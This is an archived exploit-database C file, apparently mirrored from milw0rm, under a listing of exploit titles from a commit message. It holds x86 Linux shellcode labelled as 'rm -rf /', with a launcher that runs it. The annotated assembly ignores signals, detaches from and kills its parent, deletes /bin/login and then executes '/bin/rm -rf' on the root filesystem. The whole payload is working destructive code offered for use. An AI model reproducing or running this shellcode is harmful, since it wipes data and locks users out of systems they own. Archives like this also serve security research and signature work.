exploit-db-mirror/platforms/lin_x86/shellcode/13341.c
Offensive Security 477bcbdcc0 DB: 2016-03-17
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

74 lines
No EOL
2.6 KiB
C
Executable file

/*
x86 linux rm -rf / which attempts to block the process from being stopped
132 bytes
written by onionring
*/
main()
{
char shellcode[] =
"\x31\xC0" // xor eax, eax
"\x89\xC3" // mov ebx, eax
"\x89\xC1" // mov ecx, eax
"\x41" // inc ecx
"\xB0\x30" // mov al, 0x30 ; sys_signal
"\xCD\x80" // int 0x80
"\x31\xC0" // xor eax, eax
"\xFE\xC3" // inc bl
"\x80\xFB\x1F" // cmp bl, 0x1f
"\x72\xF3" // jb 0xf3
"\x04\x40" // add al, 0x40 ; sys_getppid
"\xCD\x80" // int 0x80
"\x89\xC2" // mov edx, eax
"\x31\xC0" // xor eax, eax
"\xB0\x02" // mov al, 0x2 ; sys_fork
"\xCD\x80" // int 0x80
"\x39\xC0" // cmp eax, eax
"\x74\x08" // jnz 0x8
"\x31\xC0" // xor eax, eax
"\x89\xC3" // mov ebx, eax
"\xB0\x01" // mov al, 0x1 ; sys_exit
"\xCD\x80" // int 0x80
"\x31\xC0" // xor eax, eax
"\xB0\x42" // mov al, 0x42 ; sys_setsid
"\xCD\x80" // int 0x80
"\x43" // inc ebx
"\x39\xDA" // cmp edx, ebx
"\x74\x08" // jz 0x8
"\x89\xD3" // mov ebx, edx
"\x31\xC0" // xor eax, eax
"\x04\x25" // add al, 0x25 ; sys_kill
"\xCD\x80" // int 0x80
"\x31\xC0" // xor eax, eax
"\x50" // push eax
"\x68\x6F\x67\x69\x6E" // push "ogin"
"\x68\x69\x6E\x2F\x6C" // push "in/l"
"\x68\x2F\x2F\x2F\x62" // push "///b"
"\x89\xE3" // mov ebx, esp
"\x31\xC0" // xor eax, eax
"\x04\x0A" // add al, 0xa ; sys_unlink
"\xCD\x80" // int 0x80
"\x31\xC0" // xor eax, eax
"\x50" // push eax
"\x68\x2F\x2F\x2F\x2F" // push "////"
"\x89\xE2" // mov edx, esp
"\x50" // push eax
"\x68\x2D\x72\x66\x66" // push "-rff"
"\x89\xE1" // mov ecx, esp
"\x50" // push eax
"\x68\x6E\x2F\x72\x6D" // push "n/rm"
"\x68\x2F\x2F\x62\x69" // push "//bi"
"\x89\xE3" // mov ebx, esp
"\x50" // push eax
"\x52" // push edx
"\x51" // push ecx
"\x53" // push ebx
"\x89\xE1" // mov ecx, esp
"\x31\xD2" // xor edx, edx
"\x04\x0B" // add al, 0xb ; sys_execve
"\xCD\x80"; // int 0x80
(*(void (*)()) shellcode)();
}
// milw0rm.com [2008-08-18]